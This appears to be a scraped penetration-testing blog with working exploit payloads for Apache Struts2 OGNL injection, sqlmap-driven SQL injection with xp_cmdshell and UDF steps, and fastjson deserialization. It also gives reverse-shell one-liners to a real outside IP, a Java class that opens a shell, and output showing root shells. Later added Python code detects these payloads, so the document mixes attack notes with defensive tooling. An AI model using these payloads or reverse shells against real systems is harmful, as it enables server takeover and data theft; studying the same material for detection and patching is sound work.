<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>S2-001</title>
</head>
<body>
<h2>S2-001 Demo</h2>
<p>link: <a href="https://struts.apache.org/docs/s2-001.html">https://struts.apache.org/docs/s2-001.html</a></p>

			
<form id="login" name="login" onsubmit="return true;" action="/login.action" method="post">
<table class="wwFormTable">
	<tr>
    <td class="tdLabel"><label for="login_username" class="label">username:</label></td>
    <td
><input type="text" name="username" value="asdadas" id="login_username"/>
</td>
</tr>
root

payload1:

%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22whoami%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D

payload2(get shell):

%25{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ping","dnslog.cn"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

%25{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"/bin/bash","-c","/bin/bash -i >& /dev/tcp/47.52.233.92/12341 0>& 1"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

The following is the payload in use; in testing it injects all kinds of PoC code very effectively, and URL-encoding it works even better.
%25{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"/bin/bash","-c","/bin/bash -i >& /dev/tcp/47.52.233.92/12341 0>& 1"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
nc -lvnp 12341
Listening on 0.0.0.0 12341
Connection received on 120.242.209.224 17321
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@9485ca31e963:/usr/local/tomcat# id
uid=0(root) gid=0(root) groups=0(root)

s2-013

?url=%24%7B%28%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23out.println%28%23d%29%2C%23out.close%28%29%29%7D

struts2-dev-mode

debug=command&expression=%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d@java.lang.Runtime@getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java.io.InputStreamReader%28%23a%29%2c%23c%3dnew java.io.BufferedReader%28%23b%29%2c%23d%3dnew char%5b50000%5d%2c%23c.read%28%23d%29%2c%23genxor%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2c%23genxor.println%28%23d%29%2c%23genxor.flush%28%29%2c%23genxor.close%28%29

s2-057

Affected versions: <= Struts 2.3.34, Struts 2.5.16

Visit http://localhost:8080/${(111+111)}/actionChain1.action

Request:
GET /$%7B(111+111)%7D/actionChain1.action HTTP/1.1
Host: vuln_s2_ip:8080
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, 
  like Gecko) Chrome/83.0.4103.61 Safari/537.36 Edg/83.0.478.37
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/ap
ng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=6567848243F5C10BA42DA6C8222FFC32
Connection: close

Response:
HTTP/1.1 302 
Location: /222/register2.action
Content-Length: 0
Date: Wed, 27 May 2020 06:21:06 GMT
Connection: close

We can see that the ${(111+111)} expression has been evaluated.
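All four Struts payloads above share a handful of OGNL markers once URL-decoded: an expression opener %{ or ${, #_memberAccess / allowStaticMethodAccess / denyMethodExecution, @class@method static calls, ProcessBuilder / getRuntime(), and the devMode debug=command parameter. The Python below is an added detection example, not part of the post: it URL-decodes each record repeatedly (the payloads start with %25{, which is %{ after one round) and reports which markers fire. The log records are constructed WAF-style "METHOD PATH BODY" lines holding truncated fragments; the signal names are mine.

```python
import re
from urllib.parse import unquote_plus

# Indicators of OGNL expression injection as seen in the S2-001/S2-013/S2-057
# and devMode payloads above (signal names are mine).
OGNL_SIGNALS = [
    ("expr_open", re.compile(r"[%$]\{")),
    ("member_access", re.compile(r"#_memberAccess|allowStaticMethodAccess|denyMethodExecution")),
    ("static_call", re.compile(r"@[\w.]+@\w+")),
    ("exec", re.compile(r"ProcessBuilder|getRuntime\(\)|\.exec\(")),
    ("devmode", re.compile(r"\bdebug=command\b")),
]


def decode_layers(s, max_rounds=3):
    """URL-decode repeatedly: the payloads above start with %25{ (= %{ after one round)."""
    for _ in range(max_rounds):
        d = unquote_plus(s)
        if d == s:
            break
        s = d
    return s


def scan_request(record):
    """Return the names of the signals that fire on one request record."""
    decoded = decode_layers(record)
    return [name for name, rx in OGNL_SIGNALS if rx.search(decoded)]


def scan_log(records):
    """Return (index, signals) for each record that trips at least one signal."""
    flagged = []
    for i, rec in enumerate(records):
        signals = scan_request(rec)
        if signals:
            flagged.append((i, signals))
    return flagged


# Constructed WAF-style records ("METHOD PATH BODY"); bodies are truncated fragments,
# not working payloads.
SAMPLE_LOG = [
    "GET /$%7B(111+111)%7D/actionChain1.action",
    "POST /login.action username=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22whoami%22%7D%29%29.start%28%29%7D",
    "GET /index.action?url=%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29%7D",
    "POST /index.action debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse",
    "GET /login.action?username=alice&password=s3cret",
    "GET /search.action?q=price+%24100",
]

if __name__ == "__main__":
    for i, signals in scan_log(SAMPLE_LOG):
        print(i, signals, SAMPLE_LOG[i][:60])
```

The S2-057 probe is caught by expr_open alone because the namespace itself is the expression; the two benign records, including the one with a bare $ sign, stay clean. This is a detection aid for logs and WAF rules; the fix is the upgrade implied by the affected-version lines above.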


A note up front: this method is for upgrading a reverse shell into a fully interactive shell; it's something I worked out after some time of real use, so I'm writing it down as notes;

The perfect interactive shell

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg
reset
export SHELL=bash
//$ export TERM=xterm-256color

Likewise, I also found another method online, script /dev/null, which works the same way; an interactive shell can be obtained in the same manner:

script /dev/null
Ctrl-Z
stty raw -echo
fg
reset

This way, when we are in some command in the terminal, pressing ctrl+c or ctrl+z will not kill the shell outright. The information below is reposted from a search, for reference:

stty -echo	# disable echo: what you type does not appear on screen
stty echo 	# enable echo
stty raw 	# set raw input
stty -raw	# turn off raw input
bg			# resume a command that is paused in the background
fg			# bring a background command to the foreground and continue it
jobs		# list how many commands are running in the background
ctrl+z 		# put a command running in the foreground into the background, paused
clear  		# refreshes the screen; essentially just scrolls the terminal display one page, so scrolling up still shows previous output
reset 		# fully resets the terminal screen; all previous terminal input/output is cleared

Source: Several ways to get an interactive shell

socat

Target machine

Upload socat to the target, or download it directly

$ wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat

vuln_ip:
chmod +x /tmp/socat
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:47.52.233.92:4444
--
attack machine
socat file:`tty`,raw,echo=0 tcp-listen:4444

stty rows and columns :)

Sometimes the command typed in the terminal is too long and the terminal has too few rows/columns to display it, so commands overlap and get garbled; the method below makes using this shell more comfortable;

First look at the stty configuration on your own machine:

root@ubuntu20-free:~# stty -a
speed 9600 baud; rows 35; columns 148; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R;
werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel -iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc

speed 9600 baud; rows 35; columns 148; line = 0; is the part we need;

rows 35; columns 148
Configure our shell as follows:
$ stty rows 35 cols 148

Other pain points

Sometimes the terminal feels cluttered with too many commands, and out of habit you type clear, and then you see the following:

# clear

TERM environment variable not set.

# set |grep TERM

TERM=dumb

As shown above, check the TERM setting; the solution is simply to set TERM to xterm.

# export TERM=xterm

# set |grep TERM
TERM=xterm
_=TERM

After that you can clear freely!


「SQL injection」: SQL-SHELL

May 20, 2020. | By: Bin4xin

sqlmap injection methods


sqlmap -r Desktop/uid.txt --current-user

sqlmap -r Desktop/uid.txt -D aiweb1 --tables

sqlmap -r Desktop/uid.txt -D aiweb1 -T systemUser --columns

sqlmap -r Desktop/uid.txt -D aiweb1 -T systemUser -C id,password,userName

sqlmap -r Desktop/uid.txt --file-read="/etc/passwd"

sql-shell> select load_file('/etc/passwd')

Check database information and system version
sql-shell> select @@version
[14:29:22] [INFO] fetching SQL SELECT statement query output: 'select @@version'
select @@version:    'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) \n\tApr  2 2010 15:48:46 \n\tCopyright (c) Microsoft Corporation\n\tStandard Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)\n'

Verify whether we have sa privileges
sql-shell> select IS_SRVROLEMEMBER('sysadmin')
[14:30:08] [INFO] fetching SQL SELECT statement query output: 'select IS_SRVROLEMEMBER('sysadmin')'
select IS_SRVROLEMEMBER('sysadmin'):    '1'

Determine whether the target's MSSQL service has the `xp_cmdshell` extended stored procedure:
sql-shell> select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';
[14:31:00] [INFO] fetching SQL SELECT statement query output: 'select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell''
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';:    '1'
Any result other than `0` means the `xp_cmdshell` extended stored procedure exists.

Problems encountered

sql-shell> Exec master..xp_cmdshell 'whoami';
[14:32:58] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported

how

sqlmap -r /home/tool/sqlmap-data/wsdl-inject/net-test1.txt --batch --file-read="C:\Windows\win.ini"

[14:24:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[14:24:08] [ERROR] none of the SQL injection techniques detected can be used to read files from the underlying file system of the back-end Microsoft SQL Server server

?os-shell?

mysql: select password(''),concat('*',sha1(unhex(sha1('')))); sqlmap -d "mysql://root:Hehe123456@192.168.192.120:3306/test" --os-shell

select "hex" into outfile "D:/phpStudy/MySQL/lib/plugin/udf.dll"

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
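The sqlmap session above reads id, password and userName out of systemUser, and the [WARNING] shows that anything beyond a SELECT depends on the backend accepting stacked queries. The Python below is an added example, not from the post, using an in-memory SQLite stand-in for that table: it puts the concatenated query sqlmap exploits beside the parameterized one that resists the same input, and shows what this driver does with a stacked query. On the MSSQL side the matching controls are running the application under a non-sa login and keeping xp_cmdshell disabled through sp_configure.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the aiweb1.systemUser table queried with sqlmap above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE systemUser (id INTEGER, userName TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO systemUser VALUES (?, ?, ?)",
        [(1, "admin", "placeholder-hash-1"), (2, "bob", "placeholder-hash-2")],
    )
    return conn


def lookup_vulnerable(conn, uid):
    """String concatenation: the caller's input becomes part of the SQL text."""
    sql = "SELECT id, userName FROM systemUser WHERE id = " + uid
    return conn.execute(sql).fetchall()


def lookup_safe(conn, uid):
    """Bound parameter: the input is data and is never parsed as SQL."""
    return conn.execute("SELECT id, userName FROM systemUser WHERE id = ?", (uid,)).fetchall()


def try_stacked(conn, uid):
    """What the driver does with a stacked query (the 'non-query' case sqlmap warned about)."""
    try:
        lookup_vulnerable(conn, uid)
        return "executed"
    except (sqlite3.Warning, sqlite3.Error) as e:
        # sqlite3 refuses to run more than one statement per execute(); other drivers
        # may not, which is exactly the case the sqlmap warning is about.
        return "rejected: " + e.__class__.__name__


if __name__ == "__main__":
    db = make_db()
    tautology = "1 OR 1=1"        # constructed injection input
    print("vulnerable:", lookup_vulnerable(db, tautology))   # every row comes back
    print("safe:      ", lookup_safe(db, tautology))         # no row matches
    print("stacked:   ", try_stacked(db, "1; DROP TABLE systemUser"))
    print("table still there:", lookup_safe(db, "2"))
```

The tautology input returns the whole table through the concatenated query and nothing through the bound one; the stacked statement is refused by this driver, so the table survives, which is the property sqlmap's --os-shell and xp_cmdshell paths need the backend to lack.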


「fastjson」: A brief look at JSON deserialization

May 19, 2020. | By: Bin4xin

fastjson fingerprint

Visit the page; the response is data in a specific JSON format. Request:

GET / HTTP/1.1
Host: underattack-host:8090
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response:

HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Content-Length: 28
Date: Tue, 19 May 2020 01:05:29 GMT
Connection: close

{
    "age":25,
    "name":"Bob"
}

With the request and response above, we know the JSON format, so we construct the parameters directly and send a packet to the server:

POST / HTTP/1.1
Host: underattack-host:8090
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Length: 26

{"name":"hello", "age":20}

Response:

HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Content-Length: 30
Date: Tue, 19 May 2020 01:06:20 GMT
Connection: close

{
    "age":20,
    "name":"hello"
}

We can see that the server's response is the packet we constructed.

fastjson 1.2.24 deserialization leading to arbitrary command execution

While parsing JSON, fastjson supports using autoType to instantiate a specific class and calls that class's set/get methods to access properties. By looking up the relevant methods in the code, malicious exploitation chains can be constructed.

References:

  • https://www.freebuf.com/vuls/208339.html
  • http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/

First compile and upload the command-execution code

## cat dnslog.java

import java.lang.Runtime;
import java.lang.Process;

public class dnslog {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/sh", "-c", "ping user.`whoami`.c08aqu.dnslog.cn"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

Compile with javac dnslog.java to produce the class file; then, using the marshalsec project, start an RMI server listening on port 9999 and make the victim, after it connects to port 9999, load the class dnslog.class from the remote server; that class file is what executes the command.

git clone https://github.com/mbechler/marshalsec.git

cd marshalsec

mvn clean package -DskipTests ## after BUILD SUCCESS, cd into target

cd target

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "https://www.chihou.pro/##dnslog" 9999

* Opening JRMP listener on 9999

Start listening. Send the payload to the target server with the RMI address:

POST data:
{
    "b":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"rmi://47.52.233.92:9999/dnslog",

        "autoCommit":true
    }
}
----
{
    "name":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },

    "x":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://47.52.233.92:9999/expUseful",
        "autoCommit":true
    }
}

After sending, check the RMI server's listener log:

* Opening JRMP listener on 9999
Have connection from /61.133.171.114:11430
Reading message...
Is RMI.lookup call for dnslog 2
Sending remote classloading stub targeting https://www.chihou.pro/dnslog.class
Closing connection

The victim machine has contacted our server; finally, check whether the dnslog command was executed;

user.root.c08aqu.dnslog.cn  61.132.161.12   2020-08-14 15:43:30
user.root.c08aqu.dnslog.cn  61.132.161.5    2020-08-14 15:43:30
user.root.c08aqu.dnslog.cn  61.132.161.12   2020-08-14 15:43:30
user.root.c08aqu.dnslog.cn  61.132.161.5    2020-08-14 15:43:30

As you can see, the ping command executed successfully;

######## Reverse shell: likewise, just change the command in the PoC code to the reverse-shell command.

import java.lang.Runtime;
import java.lang.Process;

public class nc {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash", "-c", "bash -i >& /dev/tcp/47.52.233.92/12341 0>& 1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // ignore
        }
    }
}

In the same way we get a reverse shell:

## nc -lvnp 12341
Listening on 0.0.0.0 12341
Connection received on 120.242.209.70 3450
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@5a8812147218:/## whoami
whoami
root

dnslog

{"rand1":{"@type":"java.net.InetAddress","val":"http://dnslog"}}

{"rand2":{"@type":"java.net.Inet4Address","val":"http://dnslog"}}

{"rand3":{"@type":"java.net.Inet6Address","val":"http://dnslog"}}

{"rand4":{"@type":"java.net.InetSocketAddress"{"address":,"val":"http://dnslog"}}}

{"rand5":{"@type":"java.net.URL","val":"http://dnslog"}}

Some malformed payloads that can nevertheless trigger dnslog:
{"rand6":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}}
{"@type": "java.lang.AutoCloseable"


{"rand7":Set\[{"@type":"java.net.URL","val":"http://dnslog"}\]}

{"rand8":Set\[{"@type":"java.net.URL","val":"http://dnslog"}

{"rand9":{"@type":"java.net.URL","val":"http://dnslog"}


{"@type": "java.lang.AutoCloseable"



{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true}}

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true}

  • 1.2.41
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://47.52.233.92:9999/expUseful", "autoCommit":true}
// Adding [ directly does not work, because the array instantiates as an Object type, so the passed-in variable has to be set to array form; then in com.alibaba.fastjson.serializer.ObjectArrayCodec the array element, i.e. the com.sun.rowset.JdbcRowSetImpl object, is obtained via the array object's getComponentType()
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true]}
  • 1.2.42
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://47.52.233.92:9999/expUseful", "autoCommit":true}
// the [ form that worked in version 41 still works
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true]}
  • 1.2.43
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://47.52.233.92:9999/expUseful"}}
  • 1.2.45
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://47.52.233.92:9999/expUseful"}}
  • 1.2.47
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true}}}

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://47.52.233.92:9999/expUseful","autoCommit":true}}}

  • 1.2.60
{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://47.52.233.92:9999/expUseful"}
{"@type":"oracle.jdbc.connector.OracleManagedConnectionFactory","xaDataSourceName":"ldap://47.52.233.92:9999/expUseful"}
{\"@type\":\"oracle.jdbc.connector.OracleManagedConnectionFactory\",\"xaDataSourceName\":\"rmi://10.10.20.166:1099/ExportObject\"}
{\"@type\":\"org.apache.commons.configuration.JNDIConfiguration\",\"prefix\":\"ldap://10.10.20.166:1389/ExportObject\"}


{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"rmi://127.0.0.1:1099/Exploit\"}"
  • 1.2.62
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1099/exploit"}
  • 1.2.66
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://47.52.233.92:9999/expUseful"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://47.52.233.92:9999/expUseful"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://47.52.233.92:9999/expUseful"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://47.52.233.92:9999/expUseful"}}
  • RMI

{"@type":"LLcom.sun.rowset.RowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} 1.2.42
{"@type":"[com.sun.rowset.RowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} 1.2.25v1.2.43
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties""data_source":"rmi://localhost:1099/Exploit"}} 1.2.25
{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://127.0.0.1:1099/Exploit\"}1.2.60
{\"@type\":\"org.apache.commons.configuration.JNDIConfiguration\",\"prefix\":\"rmi://127.0.0.1:1099/Exploit\"} 1.2.60
{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"rmi://127.0.0.1:1099/Exploit\"} 1.2.61
{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"asText\":\"rmi://localhost:1099/Exploit\"}  1.2.62
{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"healthCheckRegistry\":\"rmi://localhost:1099/Exploit\"} AnterosDBCPConfig
{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"metricRegistry\":\"rmi://localhost:1099/Exploit\"} AnterosDBCPConfig
{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\",\"properties\":{\"UserTransaction\":\"rmi://localhost:1099/Exploit\"}} JtaTransactionConfig
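Every payload in the list above, from 1.2.24 through 1.2.66, rests on one input feature: an "@type" key naming a class, sometimes disguised with the L…; or [… descriptor syntax described at 1.2.41/1.2.42, sometimes smuggled through java.lang.Class plus val, and usually carrying an ldap:// or rmi:// reference. The Python below is an added example, not the post's or fastjson's code: it parses a request body, walks it for "@type" keys, normalizes the descriptor variants, checks the class against a denylist built from the classes named on this page, and flags JNDI URLs; bodies that are not valid JSON but still contain "@type" (the malformed Set[…] forms) are flagged as well. This is a detection aid for a gateway or WAF; the fix is upgrading fastjson and enabling safeMode, which disables autoType entirely.

```python
import json
import re

# Denylist built from the gadget classes named in the payload list on this page.
GADGET_CLASSES = {
    "com.sun.rowset.JdbcRowSetImpl",
    "com.sun.rowset.RowSetImpl",
    "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
    "org.apache.commons.configuration.JNDIConfiguration",
    "org.apache.commons.configuration2.JNDIConfiguration",
    "org.apache.xbean.propertyeditor.JndiConverter",
    "org.apache.shiro.jndi.JndiObjectFactory",
    "br.com.anteros.dbcp.AnterosDBCPConfig",
    "com.zaxxer.hikari.HikariConfig",
    "oracle.jdbc.connector.OracleManagedConnectionFactory",
    "org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
    "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
}
JNDI_RE = re.compile(r"\b(?:ldap|ldaps|rmi|iiop)://[^\s\"']+", re.IGNORECASE)
RAW_TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]+)"')


def normalize_type(name):
    """Undo the [Class and LClass; descriptor tricks shown for 1.2.41/1.2.42."""
    name = name.strip()
    while name.startswith("["):
        name = name[1:]
    while name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name


def _walk(node, path, found):
    """Collect (path, raw_type) for every @type key, including java.lang.Class/val smuggling."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "@type" and isinstance(value, str):
                found.append((path, value))
                if value == "java.lang.Class" and isinstance(node.get("val"), str):
                    found.append((path + ".val", node["val"]))
            _walk(value, path + "." + key, found)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            _walk(value, "%s[%d]" % (path, i), found)


def audit_json_body(text):
    """Return a report with parsed flag, types seen, denylist hits, JNDI refs and a verdict."""
    report = {"parsed": True, "types": [], "dangerous": [], "jndi_refs": JNDI_RE.findall(text)}
    found = []
    try:
        _walk(json.loads(text), "$", found)
    except ValueError:
        # Not valid JSON: fastjson's lenient parser may still accept it, so fall back to a raw scan.
        report["parsed"] = False
        found = [("?", t) for t in RAW_TYPE_RE.findall(text)]
    for _path, raw in found:
        cls = normalize_type(raw)
        report["types"].append(cls)
        if cls in GADGET_CLASSES:
            report["dangerous"].append(cls)
    if report["dangerous"] or report["jndi_refs"] or (found and not report["parsed"]):
        report["verdict"] = "block"
    elif found:
        report["verdict"] = "review"   # any @type at all deserves a look while autoType is on
    else:
        report["verdict"] = "allow"
    return report


# Constructed bodies; 203.0.113.10 is a documentation address.
SAMPLE_BODIES = [
    '{"name":"hello", "age":20}',
    '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://203.0.113.10:9999/x","autoCommit":true}}',
    '{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://203.0.113.10:9999/x","autoCommit":true}',
    '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"}}',
    '{"rand7":Set[{"@type":"java.net.URL","val":"http://dnslog.invalid"}]}',
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        r = audit_json_body(body)
        print(r["verdict"], r["types"], r["jndi_refs"])
```

The plain {"name","age"} body from the fingerprinting step is allowed; the 1.2.24, 1.2.42 and 1.2.47 shapes all normalize to the same JdbcRowSetImpl hit, and the Set[…] form is blocked precisely because a strict parser cannot make sense of it while fastjson would.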


「Shiro」: Notes on exploiting the Apache Shiro framework

May 18, 2020. | By: Bin4xin

Vulnerability characteristics: the signs of shiro deserialization are 1. the Set-Cookie value in the response is 「rememberMe=deleteMe」 and 2. Apache Shiro version <= 1.2.4. Many J2EE projects now adopt the shiro framework for access control; the framework's advantages are plain, and naturally it has drawbacks too. I only gradually came into contact with shiro after starting work: from code review at the beginning, then black-box penetration testing, up to the HW operation that ended a while ago. The first part is my own understanding and experience from practice, which I want to record; the second part is notes from learning online, also recorded at the time, hence the two parts.

Verification

